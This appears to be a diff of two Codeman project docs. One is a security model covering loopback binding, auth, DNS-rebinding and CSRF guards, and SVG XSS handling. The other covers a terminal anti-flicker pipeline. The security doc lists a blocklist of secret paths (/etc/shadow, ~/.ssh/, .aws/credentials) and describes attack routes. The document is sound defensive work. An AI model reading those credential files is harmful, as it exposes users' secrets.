||||
> TL;DR — Codeman binds **loopback only (`127.0.0.1`) by default**, so out of the
|
||||
> box it is reachable only from the same machine and needs no password. To reach
|
||||
> it from elsewhere, either put it behind an **authenticated tunnel**
|
||||
> (`tailscale serve` / `cloudflared`) **or** bind a wider host **and set
|
||||
> `CODEMAN_PASSWORD`**. If you bind a non‑loopback host with no password, Codeman
|
||||
> still starts but prints a **loud warning** telling you how to secure it.
|
||||
|
||||
---
|
||||
|
||||
## Contents
|
||||
|
||||
1. [Network binding model](#1-network-binding-model)
|
||||
2. [Authentication](#2-authentication)
|
||||
3. [Request‑origin trust & the tunnel caveat](#3-requestorigin-trust--the-tunnel-caveat)
|
||||
4. [Recommended remote‑access setups](#4-recommended-remoteaccess-setups)
|
||||
5. [File‑serving hardening](#5-fileserving-hardening)
|
||||
6. [tmux launch hardening](#6-tmux-launch-hardening-cod31)
|
||||
7. [Supply‑chain & build‑asset hardening](#7-supplychain--buildasset-hardening-cod28)
|
||||
8. [Multi‑instance isolation](#8-multiinstance-isolation)
|
||||
9. [Transport security headers](#9-transport-security-headers)
|
||||
10. [Quick reference](#10-quick-reference)
|
||||
|
||||
---
|
||||
|
||||
## Trust model
|
||||
|
||||
**The security boundary is the network bind plus authentication — not the code Codeman
|
||||
runs.** Because sessions launch with `--dangerously-skip-permissions`, the web UI is by
|
||||
design a remote‑code‑execution surface for whoever is allowed to reach it. Everything
|
||||
below exists to control *who* that is.
|
||||
|
||||
| Actor | Reaches the UI when… | Is granted |
|
||||
|-------|----------------------|------------|
|
||||
| Same‑machine user | Always (default loopback bind) | Full session control — the intended local‑use case. |
|
||||
| Authenticated remote client | Tunnel/LAN reachability **and** a valid password or session cookie | Full session control. |
|
||||
| Unauthenticated remote client | Only if you bind a non‑loopback host with no password | Full session control — the exact case every default and warning works to prevent. |
|
||||
| Clients behind a loopback‑connecting tunnel | A reverse tunnel terminates on `127.0.0.1` | Inherit `req.ip = 127.0.0.1`, so they hit the localhost‑only exemptions (§3) unless a password is set. |
|
||||
|
||||
**Explicitly out of scope.** Codeman is access control for the operator console, not a
|
||||
sandbox for the code that console runs. It does **not** defend against: a compromised
|
||||
local user account (loopback is trusted), malicious contents in a workspace you
|
||||
deliberately open, or the breadth of filesystem a session's `workingDir` is pointed at
|
||||
(§5).
|
||||
|
||||
---
|
||||
|
||||
## 1. Network binding model
|
||||
|
||||
| Setting | Default | Source |
|
||||
|---------|---------|--------|
|
||||
| Bind host | `127.0.0.1` (loopback) | `--host` / `CODEMAN_HOST` → `WebServer` ctor |
|
||||
| Port | `3000` | `--port` / `CODEMAN_PORT` |
|
||||
| TLS | off (`--https` to enable) | `--https` |
|
||||
|
||||
### Bind host classification
|
||||
|
||||
`isLoopbackBindHost()` (`src/web/network-auth-policy.ts`) decides whether a bind
|
||||
host is loopback-only. It returns `true` for:
|
||||
|
||||
- `localhost`
|
||||
- any IPv4 in `127.0.0.0/8` (e.g. `127.0.0.1`, `127.42.0.9`)
|
||||
- IPv6 loopback `::1` (bracketed `[::1]` and the long form `0:0:0:0:0:0:0:1`)
|
||||
- IPv4‑mapped loopback `::ffff:127.*`
|
||||
|
||||
It returns `false` for `0.0.0.0`, `::` (all interfaces), LAN IPs, and hostnames.
|
||||
The classification is **fail‑safe in the dangerous direction**: any host that is
|
||||
not provably loopback is treated as non‑loopback (it never mistakes `0.0.0.0`
|
||||
for loopback). Shorthand forms like `127.1` or integer/octal IPs classify as
|
||||
non‑loopback (you'll get a warning, not a silent wide‑open bind) — use
|
||||
`127.0.0.1` for an unambiguous loopback bind.
|
||||
|
||||
### Startup policy (the "warn, don't block" rule)
|
||||
|
||||
At `WebServer.start()`:
|
||||
|
||||
| Bind host | `CODEMAN_PASSWORD` | Behavior |
|
||||
|-----------|--------------------|----------|
|
||||
| loopback (default) | unset | **Start.** Safe — reachable only from this machine. |
|
||||
| loopback | set | **Start.** Auth required even locally. |
|
||||
| non‑loopback | set | **Start.** Auth protects the open bind. |
|
||||
| non‑loopback | unset | **Start + LOUD warning** listing how to secure it. |
|
||||
| non‑loopback | unset, `--allow-unauthenticated-network` | **Start + terse acknowledged note.** |
|
||||
|
||||
> History: an earlier iteration (unreleased COD‑29) *refused to start* on a
|
||||
> non‑loopback bind without a password. That surprised setups that "just worked"
|
||||
> before, so **0.9.0 changed it to start‑and‑warn**. Loopback is still the safe
|
||||
> default; the warning (with three concrete fixes) replaces the hard failure.
|
||||
|
||||
The warning points at three ways to secure the instance:
|
||||
|
||||
1. `CODEMAN_PASSWORD=<password>` — turns on HTTP Basic auth (see §2).
|
||||
2. `--host 127.0.0.1` + an authenticated tunnel (`cloudflared` / `tailscale serve`).
|
||||
3. `--allow-unauthenticated-network` / `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1`
|
||||
— explicitly accept the risk (downgrades the warning to a one‑line note). This
|
||||
flag is **only** an acknowledgement; it does not change reachability.
|
||||
|
||||
`CODEMAN_API_URL` (used by hooks/child processes) is always derived as a loopback
|
||||
address (`0.0.0.0`/`localhost`/`::1` → `127.0.0.1`) so in‑process hooks reach the
|
||||
server over loopback regardless of the public bind.
|
||||
|
||||
---
|
||||
|
||||
## 2. Authentication
|
||||
|
||||
Auth is **optional** and controlled by env vars captured at startup:
|
||||
|
||||
- `CODEMAN_USERNAME` (default `admin` when only a password is set)
|
||||
- `CODEMAN_PASSWORD`
|
||||
|
||||
When `CODEMAN_PASSWORD` is unset, no auth is enforced — which is why the default
|
||||
loopback bind matters. The auth pipeline (`src/web/middleware/auth.ts`,
|
||||
`onRequest` hook) runs in this order:
|
||||
|
||||
1. **Localhost‑only exemptions** (always first): `POST /api/hook-event` and the QR
|
||||
`/q/` short‑code path are exempt when `req.ip` is loopback (see §3). While the
|
||||
**managed tunnel is running**, the hook‑event exemption additionally requires
|
||||
the per‑instance `X-Codeman-Hook-Secret` header (COD‑54); failed presentations
|
||||
are rate‑limited in a **dedicated bucket** (separate from Basic‑Auth failures)
|
||||
so misfiring hooks can never lock out the login path.
|
||||
2. **Session cookie** check — a valid `codeman_session` cookie short‑circuits to
|
||||
allow.
|
||||
3. **HTTP Basic** check — correct credentials short‑circuit to allow and clear
|
||||
that IP's failure counter.
|
||||
4. **Rate‑limit gate** — if neither cookie nor credentials passed and the IP is
|
||||
locked out, return `429` with a `Retry-After` header.
|
||||
5. Otherwise return `401`, incrementing the IP's failure counter.
|
||||
|
||||
### Session cookies
|
||||
|
||||
On successful Basic auth the server issues `codeman_session`, an opaque
|
||||
server‑side token (`randomBytes(32)`), valid 24h with auto‑extend and device
|
||||
context for the audit log. Tokens are **not** client‑signed — they're validated
|
||||
by presence in a server‑side map, so they cannot be forged offline.
|
||||
|
||||
### Rate limiting / lockout recovery
|
||||
|
||||
Failed auth is tracked **per IP**: 10 failures → `429`, with a 15‑minute decay.
|
||||
The QR path has its own separate limiter.
|
||||
|
||||
The lockout check sits **after** the cookie/credential checks (step 4, not first).
|
||||
This is deliberate: a user with a **valid cookie or correct password recovers
|
||||
immediately** even while an attacker is hammering the same IP — important because
|
||||
all traffic through a tunnel shares one source IP (loopback). Wrong credentials
|
||||
are still counted and still hit the `429` at the threshold, so brute‑force
|
||||
protection is unchanged.
|
||||
|
||||
---
|
||||
|
||||
## 3. Request‑origin trust & the tunnel caveat
|
||||
|
||||
`req.ip` is derived from the **TCP socket only** — Fastify runs with
|
||||
`trustProxy: false`, so `X-Forwarded-For` / `X-Real-IP` / `Forwarded` are
|
||||
**ignored**. A remote client cannot forge `req.ip` to `127.0.0.1`.
|
||||
|
||||
**However**, a reverse tunnel that connects to the server over loopback (e.g.
|
||||
`cloudflared --url http://localhost:3000`) makes **every tunneled request arrive
|
||||
with `req.ip = 127.0.0.1`**. The localhost‑only exemptions then treat those
|
||||
requests as local:
|
||||
|
||||
- `POST /api/hook-event` — auth‑exempt for loopback **only while no managed tunnel
|
||||
is running**. When Codeman's own tunnel is up, the exemption requires the
|
||||
per‑instance shared secret (`X-Codeman-Hook-Secret`, 256‑bit hex in
|
||||
`~/.codeman/hook-secret`, mode 0600, COD‑54). Local hook commands read the
|
||||
secret file at execution time (`$CODEMAN_HOOK_SECRET_FILE`, exported into every
|
||||
managed session), so they keep working — tunneled internet traffic can't know
|
||||
it. Even without the secret the impact is bounded: the route is
|
||||
`HookEventSchema`‑validated and requires a valid in‑memory `sessionId`; it can
|
||||
drive respawn signals, SSE broadcasts, push notifications, and transcript
|
||||
watching — **not** arbitrary terminal input or file reads. ⚠️ The gate keys off
|
||||
the **managed** tunnel — an externally run loopback proxy (your own
|
||||
`cloudflared`, `tailscale serve`) is invisible to it, so the plain loopback
|
||||
exemption still applies there (prefer `tailscale serve`, which authenticates at
|
||||
the tailnet layer). Hook configs regenerated since COD‑54 always present the
|
||||
header, so a future release can require the secret unconditionally.
|
||||
- QR `/q/` — still protected by its own short‑code brute‑force limiter
|
||||
(10 failures / 60s against a 62⁶ space).
|
||||
|
||||
**Mitigation:** set `CODEMAN_PASSWORD` whenever a loopback‑connecting tunnel is
|
||||
up — it gates everything except the (secret‑gated) hook exemption and is the
|
||||
documented practice; since COD‑55 enabling the managed tunnel **refuses** to start
|
||||
without it unless `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1` explicitly
|
||||
acknowledges the exposure. Prefer `tailscale serve` (below), which authenticates
|
||||
at the tailnet layer so untrusted clients never reach the loopback port at all.
|
||||
|
||||
### Host‑header & Origin allowlist (DNS‑rebinding & CSRF defense)
|
||||
|
||||
Since **0.9.5** an **always‑on** `onRequest` hook (`registerHostGuard`,
|
||||
`src/web/middleware/auth.ts`; policy in `src/web/network-auth-policy.ts`) runs
|
||||
**before** the auth pipeline in §2 and guards **every** request — including the
|
||||
localhost‑only exemptions above, SSE, the WebSocket upgrade, and static files. It
|
||||
closes the browser‑driven RCE path (DNS rebinding plus a cross‑site `text/plain`
|
||||
`POST`) that the loopback‑no‑password default otherwise exposed to any site the
|
||||
operator merely visits.
|
||||
|
||||
- **Host allowlist (anti‑DNS‑rebinding).** The `Host` header is validated on
|
||||
**every** request, all methods. A custom domain rebound to `127.0.0.1` is
|
||||
rejected with `403 Forbidden: host not allowed` before any handler runs. Allowed:
|
||||
`localhost`; **any** IP literal (IPv4/IPv6 — a browser hitting a numeric address
|
||||
can't be a rebinding victim); the bind host; the suffixes `.ts.net`,
|
||||
`.trycloudflare.com`, `.cfargotunnel.com`; the hostname of the active
|
||||
Codeman‑managed tunnel; and anything in `CODEMAN_ALLOWED_HOSTS`. A missing/empty
|
||||
`Host` is rejected.
|
||||
- **Origin / CSRF guard.** On **state‑changing** methods (everything except
|
||||
`GET`/`HEAD`/`OPTIONS`) the `Origin` header must also pass the same allowlist,
|
||||
else `403 Forbidden: cross‑site request blocked`. A **missing `Origin` is
|
||||
allowed** (so `curl`, the CLI, and Claude Code hooks keep working); only a
|
||||
present‑but‑foreign origin — or the opaque `null` origin (sandboxed iframe) — is
|
||||
rejected. This blocks the cross‑site CSRF that could previously create sessions,
|
||||
trigger self‑update, or flip `tunnelEnabled`.
|
||||
- **Raw `text/plain` bodies.** The global `text/plain` content‑type parser no
|
||||
longer JSON‑parses bodies — it hands handlers the raw string (`/api/crash-diag`
|
||||
self‑parses its beacon payload). This removes the CORS "simple request" CSRF
|
||||
vector, where a cross‑site `fetch` with `Content-Type: text/plain` smuggled a
|
||||
JSON body into a write route with no preflight — defense‑in‑depth alongside the
|
||||
Origin guard.
|
||||
- **WebSocket upgrades.** The terminal WS upgrade (`src/web/routes/ws-routes.ts`)
|
||||
runs the **same** Host + Origin check and closes with code `4003` on failure
|
||||
(anti‑CSWSH).
|
||||
|
||||
The policy is rebuilt per request from
|
||||
`buildHostPolicy(bindHost, tunnelManager.getUrl())`, so starting or stopping a
|
||||
tunnel at runtime updates the allowlist with no restart.
|
||||
|
||||
> **Reverse‑proxy operators:** a custom proxy domain (e.g. `codeman.example.com`)
|
||||
> is **not** in the default allowlist and gets `403 host not allowed`. Add it via
|
||||
> `CODEMAN_ALLOWED_HOSTS` — comma‑separated, case‑insensitive; an exact hostname
|
||||
> matches only itself, while a leading‑dot entry (`.corp.internal`) matches the
|
||||
> bare domain **and** all subdomains. Behaviour is covered by
|
||||
> `test/network-host-guard.test.ts`.
|
||||
|
||||
---
|
||||
|
||||
## 4. Recommended remote‑access setups
|
||||
|
||||
Ordered most‑to‑least recommended:
|
||||
|
||||
### A. Tailscale serve (recommended)
|
||||
|
||||
Bind loopback, let Tailscale front it on your tailnet with a real cert:
|
||||
|
||||
```bash
|
||||
codeman web --https # binds 127.0.0.1:3000
|
||||
tailscale serve --bg https / http://127.0.0.1:3000
|
||||
```
|
||||
|
||||
Only devices on your tailnet can reach it; Tailscale handles identity. No app
|
||||
password and no `0.0.0.0` bind required. (This is the maintainer's production
|
||||
setup.)
|
||||
|
||||
### B. Authenticated cloudflared tunnel + password
|
||||
|
||||
```bash
|
||||
export CODEMAN_PASSWORD=<password>
|
||||
codeman web --https
|
||||
cloudflared tunnel --url https://localhost:3000
|
||||
```
|
||||
|
||||
Always set `CODEMAN_PASSWORD` here — the tunnel connects over loopback, so the
|
||||
hook‑event exemption (§3) would otherwise be reachable from the public URL.
|
||||
|
||||
### C. Direct LAN bind + password
|
||||
|
||||
```bash
|
||||
export CODEMAN_PASSWORD=<password>
|
||||
codeman web --https --host 0.0.0.0
|
||||
```
|
||||
|
||||
Exposes the port on all interfaces; the password is the only thing protecting it.
|
||||
|
||||
### Avoid
|
||||
|
||||
`--host 0.0.0.0` **without** a password. Codeman will start (and warn), but
|
||||
anyone on the network can control your Claude sessions. Never re‑expose `0.0.0.0`
|
||||
without a password.
|
||||
|
||||
---
|
||||
|
||||
## 5. File‑serving hardening
|
||||
|
||||
Three routes serve workspace files; all require a valid `sessionId` and run the
|
||||
shared path validator `validateSessionFilePath()` (`src/web/route-helpers.ts`):
|
||||
it `realpath`s the target **before** the boundary check and rejects anything that
|
||||
escapes the session working directory (`..`, absolute paths, and symlinks that
|
||||
resolve outside). The realpath‑before‑check ordering closes the validation‑time
|
||||
TOCTOU window.
|
||||
|
||||
| Route | Cap | Notes |
|
||||
|-------|-----|-------|
|
||||
| `file-content` | 10 MB | text preview |
|
||||
| `file-raw` | 50 MB | inline MIME map; **`X-Content-Type-Options: nosniff` on all responses** |
|
||||
| `POST /api/download` | 50 MB | forced `attachment`; sensitive‑path blocklist |
|
||||
|
||||
### SVG / content‑type XSS
|
||||
|
||||
A workspace `.svg` served inline as `image/svg+xml` is a stored‑XSS vector (SVG
|
||||
can carry `<script>`, same‑origin = full session control). `file-raw` therefore
|
||||
serves `.svg` as `application/octet-stream` + `Content-Disposition: attachment` +
|
||||
`nosniff`. The control here is the **`octet-stream` + `attachment` + `nosniff`
|
||||
combination**, which forces a download instead of a render — not the CSP: the
|
||||
policy's `script-src` allows `'unsafe-inline'` (§9), so a same‑origin HTML
|
||||
document *would* be able to run inline scripts if the browser ever rendered it.
|
||||
By the same combination, other text types (`.html`, `.xml`, …) that fall through
|
||||
to `octet-stream` are downloaded, not executed. Trusted QR/welcome SVGs are
|
||||
injected from API JSON (`innerHTML`), not via `file-raw`, so they are unaffected.
|
||||
|
||||
### Download sensitive‑path blocklist
|
||||
|
||||
`/api/download` additionally refuses a blocklist of sensitive paths
|
||||
(`/etc/shadow`, `~/.ssh/`, `.env`, `*credentials*`, `.aws/credentials`, …). This
|
||||
is **defense‑in‑depth, not the primary boundary** — the realpath containment is
|
||||
the control. The blocklist patterns are shared (`src/web/sensitive-path.ts`) with
|
||||
the attachment guard below.
|
||||
|
||||
### External attachments (registry) & the magic‑link trust boundary
|
||||
|
||||
Live external attachments (`src/attachment-registry.ts`) mint an `att_<uuid>` id
|
||||
for a host file so browser requests carry the id, never an absolute path. Serving
|
||||
is by id (`GET /api/sessions/:id/attachments/:attachmentId/raw`, 50 MB cap,
|
||||
`nosniff`) and re‑resolves the symlink + re‑checks the **attachment guard**
|
||||
(`src/config/attachment-guard.ts`: the shared sensitive‑path blocklist **plus**
|
||||
the `/root` and `/etc` trees, extendable via `attachmentBlockedPaths` /
|
||||
`CODEMAN_ATTACHMENT_BLOCKED_PATHS`) on every request. Unlike the workspace file
|
||||
routes, attachments are intentionally **cross‑workspace** — so the effective gate
|
||||
is the blocklist + a 6‑extension allowlist (`png/pdf/docx/pptx/md/txt`), not
|
||||
realpath containment.
|
||||
|
||||
Two registration paths, with **different trust**:
|
||||
|
||||
- **Explicit `POST /api/sessions/:id/attachments`** (and `codeman attach`, which
|
||||
POSTs directly inside a managed session) — a deliberate, Origin‑guarded HTTP
|
||||
request. Allowed cross‑workspace (subject to the guard). This is the supported
|
||||
path for codeman‑publish and the `~/.codeman` review‑card loop.
|
||||
- **Terminal `codeman://attach?path=…` magic links** — scanned passively from
|
||||
session output. Terminal output is **attacker‑influenceable** (a prompt‑injected
|
||||
session can print an arbitrary path), and registration here is server‑side with
|
||||
no Origin gate and broadcasts the `rawUrl` over SSE to all clients. This path is
|
||||
therefore **force‑confined to the session workspace** (`forceWorkspaceConfinement`
|
||||
in `registerExternalAttachment`, wired in `WebServer.registerAttachment`),
|
||||
regardless of the global confine setting — a passive magic link cannot expose a
|
||||
file outside the session's own workspace. Cross‑workspace attach must go through
|
||||
the explicit POST path above.
|
||||
|
||||
### SSE log‑tail route — intentional extra read roots
|
||||
|
||||
The live file‑tail SSE route (`FileStreamManager`, used to stream a growing log
|
||||
into the UI) does **not** use `validateSessionFilePath`; it has its own validator
|
||||
with a deliberately **wider** allowlist: the session `workingDir` **plus two
|
||||
read‑only log roots — `/var/log` and `~/logs`** — so operators can tail
|
||||
system/app logs. `/tmp` is intentionally excluded (world‑writable). Like the
|
||||
other routes it `realpath`s the target and re‑checks right before spawning `tail`
|
||||
(TOCTOU guard), and it is read‑only. This is the one place the per‑session
|
||||
boundary is intentionally relaxed; on a password‑protected remote deployment an
|
||||
authenticated user can therefore read `/var/log` and `~/logs` outside their
|
||||
session dir. (Security review M5: this divergence is by design and is now
|
||||
documented here rather than silently diverging from the per‑session claim above.)
|
||||
|
||||
### Known limitation — `workingDir` scope
|
||||
|
||||
The file‑route boundary is the session's `workingDir`, and `POST /api/sessions`
|
||||
currently accepts an arbitrary absolute `workingDir` (validated as "exists + is a
|
||||
directory"). A session created with `workingDir=/` can therefore read files
|
||||
across the filesystem within that boundary. This is **pre‑existing** across all
|
||||
file routes and not widened by the recent changes. Recommended follow‑up:
|
||||
constrain `workingDir` to an allowlist (e.g. under the cases dir / `$HOME`).
|
||||
|
||||
---
|
||||
|
||||
## 6. tmux launch hardening (COD‑31)
|
||||
|
||||
New sessions and respawns launch the tmux server/pane from a stable `/tmp`
|
||||
(`TMUX_LAUNCH_CWD`) and then `cd` into the real workspace **inside** the pane,
|
||||
against the live mount table:
|
||||
|
||||
```
|
||||
respawn-pane -k -c /tmp -t <session> bash -c "cd <workingDir> && <cmd>"
|
||||
```
|
||||
|
||||
This avoids a class of failures on FUSE/rclone‑mounted workspaces where a
|
||||
transient mount blip at launch poisons tmux's long‑lived cwd and crashes
|
||||
`new-session`. Safety properties:
|
||||
|
||||
- **Fail‑safe cwd:** the command is `cd "<dir>" && <cmd>` — if `cd` fails the CLI
|
||||
does **not** run in `/tmp`; the pane dies with a visible error instead.
|
||||
- **No injection:** `workingDir` passes `isValidWorkingDir` (absolute, rejects
|
||||
`;&|$\`(){}<>'"` and newlines and `..`) and `isValidPath`, and is double‑quoted
|
||||
in the pane command. Paths with spaces work; metacharacters are rejected before
|
||||
reaching the shell.
|
||||
- It does not change which tmux socket is targeted, so instance isolation (§8) is
|
||||
preserved.
|
||||
|
||||
---
|
||||
|
||||
## 7. Supply‑chain & build‑asset hardening (COD‑28)
|
||||
|
||||
- **Dependency advisories:** security‑sensitive ranges are bumped to patched
|
||||
versions, and `overrides` force patched transitive deps (`picomatch`,
|
||||
`basic-ftp`, `fast-uri`, `flatted`). `test/dependency-security.test.ts` asserts
|
||||
these stay patched in the lockfile.
|
||||
- **Lockfile integrity:** `npm run check:lockfile` (CI on every push/PR) fails on
|
||||
drift between `package.json` and `package-lock.json`. All lockfile entries
|
||||
resolve to `registry.npmjs.org` with `sha512` integrity hashes.
|
||||
- **Public‑asset checker:** `npm run check:public-assets`
|
||||
(`scripts/check-public-assets.mjs`) scans `src/web/public/**` for literal NUL
|
||||
bytes and runs `node --check` on every `.js` file (syntax validation), plus a
|
||||
Prettier pass on maintained files. It uses `execFileSync` with argv arrays (no
|
||||
shell), so filenames/content cannot inject commands; `node --check` only parses,
|
||||
never executes. Large hand‑formatted/generated assets (`app.js`, the gesture
|
||||
bundle, vendored libs) are `.prettierignore`d for the style pass, but the NUL +
|
||||
syntax checks still cover them.
|
||||
|
||||
---
|
||||
|
||||
## 8. Multi‑instance isolation
|
||||
|
||||
The tmux socket (`tmux -L codeman[-<instance>]`) and data dir
|
||||
(`~/.codeman[-<instance>]`) are **process‑wide and shared by every Codeman on the
|
||||
machine**, derived from `CODEMAN_INSTANCE` (`src/config/instance.ts`). A second
|
||||
instance on the **same** socket discovers and attaches PTYs to the first
|
||||
instance's live sessions. To run instances side by side, give each a distinct
|
||||
`CODEMAN_INSTANCE` (scopes both dir + socket), or set `CODEMAN_TMUX_SOCKET` +
|
||||
`CODEMAN_DATA_DIR` individually. `CODEMAN_INSTANCE` defaults to empty = the
|
||||
production layout (`~/.codeman`, `-L codeman`, port 3000).
|
||||
|
||||
---
|
||||
|
||||
## 9. Transport security headers
|
||||
|
||||
`registerSecurityHeaders` (`src/web/middleware/auth.ts`) applies on every response:
|
||||
|
||||
- **`Content-Security-Policy`** — baseline `default-src 'self'`, with these
|
||||
deliberate widenings (so the policy is tighter than "self only" but every
|
||||
exception is enumerated and same‑origin‑first):
|
||||
- `script-src` / `style-src` / `font-src` also allow `https://cdn.jsdelivr.net`
|
||||
(CDN fallback for a few libraries). `script-src` and `style-src` additionally
|
||||
allow `'unsafe-inline'` — relevant to the SVG/HTML handling in §5, where the
|
||||
`octet-stream` + `nosniff` download (not the CSP) is what blocks execution.
|
||||
Because `'unsafe-inline'` is still present (removing it needs a nonce
|
||||
migration), AI‑derived strings rendered into the subagent/activity panels are
|
||||
HTML‑escaped at the injection sites (`escapeHtml` in
|
||||
`src/web/public/constants.js`; sinks in `panels-ui.js` / `subagent-windows.js`)
|
||||
so a hostile tool name or argument can't execute — defense‑in‑depth from the
|
||||
2026‑06‑09 review (H4).
|
||||
- `connect-src` allows `wss://api.deepgram.com` (streaming voice input).
|
||||
- `img-src` allows `data:` and `blob:` (inline / generated images, QR codes).
|
||||
- `frame-ancestors 'self'`.
|
||||
- **Gesture opt‑in (`CODEMAN_GESTURE=1`):** `script-src` gains
|
||||
`'wasm-unsafe-eval'` and a `worker-src 'self' blob:` directive is added, for
|
||||
self‑hosted MediaPipe. Its wasm runtime + model are same‑origin under
|
||||
`/gesture/`, so no extra `connect-src` entry is needed. OFF by default, so the
|
||||
production CSP is byte‑for‑byte unchanged.
|
||||
- **`X-Content-Type-Options: nosniff`** — blocks MIME sniffing (pairs with §5).
|
||||
- **`X-Frame-Options: SAMEORIGIN`** — clickjacking defense (mirrors
|
||||
`frame-ancestors 'self'`).
|
||||
- **`Strict-Transport-Security: max-age=31536000; includeSubDomains`** — only when
|
||||
served over HTTPS (`--https`).
|
||||
- **CORS** — `Access-Control-Allow-Origin` is reflected **only** for origins whose
|
||||
hostname is `localhost` / `127.0.0.1` / `::1`; any other origin gets no CORS
|
||||
headers. `OPTIONS` preflights are answered `204`.
|
||||
|
||||
---
|
||||
|
||||
## 10. Quick reference
|
||||
|
||||
| Env / flag | Effect |
|
||||
|------------|--------|
|
||||
| `CODEMAN_PASSWORD` (+ `CODEMAN_USERNAME`) | Enable HTTP Basic auth |
|
||||
| `--host` / `CODEMAN_HOST` | Bind host (default `127.0.0.1`) |
|
||||
| `CODEMAN_ALLOWED_HOSTS` | Extra `Host`/`Origin` allowlist entries for reverse proxies (comma‑separated; exact host, or leading‑dot `.suffix` for subdomains) — see §3 |
|
||||
| `--allow-unauthenticated-network` / `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK` | Acknowledge an unauthenticated non‑loopback bind (downgrades the warning) |
|
||||
| `--https` | Enable TLS (adds HSTS) |
|
||||
| `CODEMAN_INSTANCE` | Scope tmux socket + data dir for isolation |
|
||||
| `CODEMAN_GESTURE=1` | Make the gesture overlay available (widens CSP) |
|
||||
|
||||
**Audit log:** session lifecycle and server start are recorded in
|
||||
`~/.codeman/session-lifecycle.jsonl`.
|
||||
|
||||
### Key source files
|
||||
|
||||
| Concern | File |
|
||||
|---------|------|
|
||||
| Bind‑host classification, env‑flag parsing, Host/Origin allowlist (`buildHostPolicy` / `isAllowedRequestHost` / `isAllowedRequestOrigin`) | `src/web/network-auth-policy.ts` |
|
||||
| Start‑and‑warn policy | `src/web/server.ts` (`WebServer.start()`) |
|
||||
| Auth pipeline, rate limiting, security headers, CORS, Host/Origin guard (`registerHostGuard`) | `src/web/middleware/auth.ts` |
|
||||
| File‑path containment (realpath‑before‑check) | `src/web/route-helpers.ts` (`validateSessionFilePath`) |
|
||||
| File routes, caps, SVG handling, download blocklist | `src/web/routes/file-routes.ts` |
|
||||
| Instance/socket/data‑dir scoping | `src/config/instance.ts` |
|
||||
|
||||
---
|
||||
|
||||
> **Maintenance note:** the behaviours above were verified against the source on
|
||||
> 2026‑06‑09. When you change auth, the bind policy, CSP/headers, or the file
|
||||
> routes, update this document in the same change — several sections quote exact
|
||||
> values (caps, CSP directives, TTLs) that drift silently otherwise.
|
||||
@@ -1,138 +0,0 @@
|
||||
# Terminal Anti-Flicker System
|
||||
|
||||
Claude Code uses [Ink](https://github.com/vadimdemedes/ink) (React for terminals), which redraws the entire screen on every state change. Without special handling, users see constant flickering. Codeman implements a 6-layer anti-flicker pipeline.
|
||||
|
||||
## Pipeline Overview
|
||||
|
||||
```
|
||||
PTY Output → Server Batching → DEC 2026 Wrap → SSE → Client rAF → Sync Parser → xterm.js
|
||||
```
|
||||
|
||||
| Layer | Location | Technique | Latency |
|
||||
|-------|----------|-----------|---------|
|
||||
| **1. Server Batching** | `server.ts:batchTerminalData()` | Adaptive 16-50ms collection window | 16-50ms |
|
||||
| **2. DEC Mode 2026** | `server.ts:flushTerminalBatches()` | Wraps with `\x1b[?2026h`...`\x1b[?2026l` | 0ms |
|
||||
| **3. SSE Broadcast** | `server.ts:broadcast()` | JSON serialize once, send to all clients | 0ms |
|
||||
| **4. Client rAF** | `app.js:batchTerminalWrite()` | `requestAnimationFrame` batching | 0-16ms |
|
||||
| **5. Sync Block Parser** | `app.js:extractSyncSegments()` | Strips DEC 2026 markers, waits for complete blocks | 0-50ms |
|
||||
| **6. Chunked Loading** | `app.js:chunkedTerminalWrite()` | 64KB/frame for large buffers | variable |
|
||||
|
||||
## Server-Side Implementation (`server.ts`)
|
||||
|
||||
### Constants
|
||||
|
||||
```typescript
|
||||
const TERMINAL_BATCH_INTERVAL = 16; // Base: 60fps
|
||||
const BATCH_FLUSH_THRESHOLD = 32 * 1024; // Flush immediately if >32KB
|
||||
const DEC_SYNC_START = '\x1b[?2026h'; // Begin synchronized update
|
||||
const DEC_SYNC_END = '\x1b[?2026l'; // End synchronized update
|
||||
```
|
||||
|
||||
### Adaptive Batching (`batchTerminalData()`)
|
||||
|
||||
- Tracks event frequency per session via `lastTerminalEventTime` Map
|
||||
- Event gap <10ms → 50ms batch window (rapid-fire Ink redraws)
|
||||
- Event gap <20ms → 32ms batch window
|
||||
- Otherwise → 16ms (60fps)
|
||||
- Flushes immediately if batch exceeds 32KB for responsiveness
|
||||
|
||||
### Flush Logic (`flushTerminalBatches()`)
|
||||
|
||||
```typescript
|
||||
const syncData = DEC_SYNC_START + data + DEC_SYNC_END;
|
||||
this.broadcast('session:terminal', { id: sessionId, data: syncData });
|
||||
```
|
||||
|
||||
## Client-Side Implementation (`app.js`)
|
||||
|
||||
### `batchTerminalWrite(data)`
|
||||
|
||||
1. Checks if flicker filter is enabled (optional, per-session)
|
||||
2. If flicker filter active: buffers screen-clear patterns (`ESC[2J`, `ESC[H ESC[J`, `ESC[nA`)
|
||||
3. Accumulates data in `pendingWrites`
|
||||
4. Schedules `requestAnimationFrame` if not already scheduled
|
||||
5. On rAF callback: checks for incomplete sync blocks (start without end)
|
||||
6. If incomplete: waits up to 50ms via `syncWaitTimeout`
|
||||
7. Calls `flushPendingWrites()` when complete
|
||||
|
||||
### `extractSyncSegments(data)`
|
||||
|
||||
- Parses DEC 2026 markers, returns array of content segments
|
||||
- Content before sync blocks returned as-is
|
||||
- Content inside sync blocks returned without markers
|
||||
- Incomplete blocks (start without end) returned with marker for next chunk
|
||||
|
||||
### `flushPendingWrites()`
|
||||
|
||||
```javascript
|
||||
const segments = extractSyncSegments(this.pendingWrites);
|
||||
this.pendingWrites = ''; // Clear before writing
|
||||
for (const segment of segments) {
|
||||
if (segment && !segment.startsWith(DEC_SYNC_START)) {
|
||||
terminal.write(segment); // Skip incomplete blocks (start with marker)
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Note: Segments starting with `DEC_SYNC_START` are incomplete blocks awaiting more data. These are skipped (discarded if timeout forces flush).
|
||||
|
||||
### `chunkedTerminalWrite(buffer, chunkSize=128KB)`
|
||||
|
||||
- For large buffer restoration (session switch, reconnect)
|
||||
- Writes 128KB per `requestAnimationFrame` to avoid UI jank
|
||||
- Strips any embedded DEC 2026 markers from historical data
|
||||
|
||||
### `selectSession()` Optimizations
|
||||
|
||||
- Starts buffer fetch immediately before other setup
|
||||
- Shows "Loading session..." indicator while fetching
|
||||
- Parallelizes session attach with buffer fetch
|
||||
- Fire-and-forget resize (doesn't block tab switch)
|
||||
|
